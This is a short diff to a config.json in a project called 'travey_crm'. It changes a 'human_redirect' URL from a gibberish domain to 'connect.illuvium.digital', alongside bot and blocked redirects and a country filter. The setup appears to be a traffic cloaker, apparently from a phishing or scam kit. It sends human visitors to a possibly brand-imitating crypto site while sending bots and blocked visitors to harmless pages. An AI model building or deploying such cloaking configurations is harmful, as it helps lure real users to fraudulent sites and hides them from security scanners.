--- a/travey_crm/data/config.json
+++ b/travey_crm/data/config.json
@@ -1,6 +1,6 @@
 {
     "bot_redirect": null,
-    "human_redirect": "https:\/\/eywordvailabom.com/hosn/",
+    "human_redirect": "https:\/\/connect.illuvium.digital/",
     "blocked_redirect": "https:\/\/www.google.com",
     "country_mode": "allow_all",
     "allowed_countries": [
